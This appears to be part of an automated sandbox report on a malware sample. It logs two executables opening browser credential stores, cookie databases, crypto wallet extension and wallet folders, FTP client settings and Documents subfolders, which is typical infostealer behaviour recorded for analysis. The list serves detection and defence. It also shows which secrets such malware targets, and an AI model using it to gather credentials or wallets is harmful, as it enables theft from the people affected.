Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
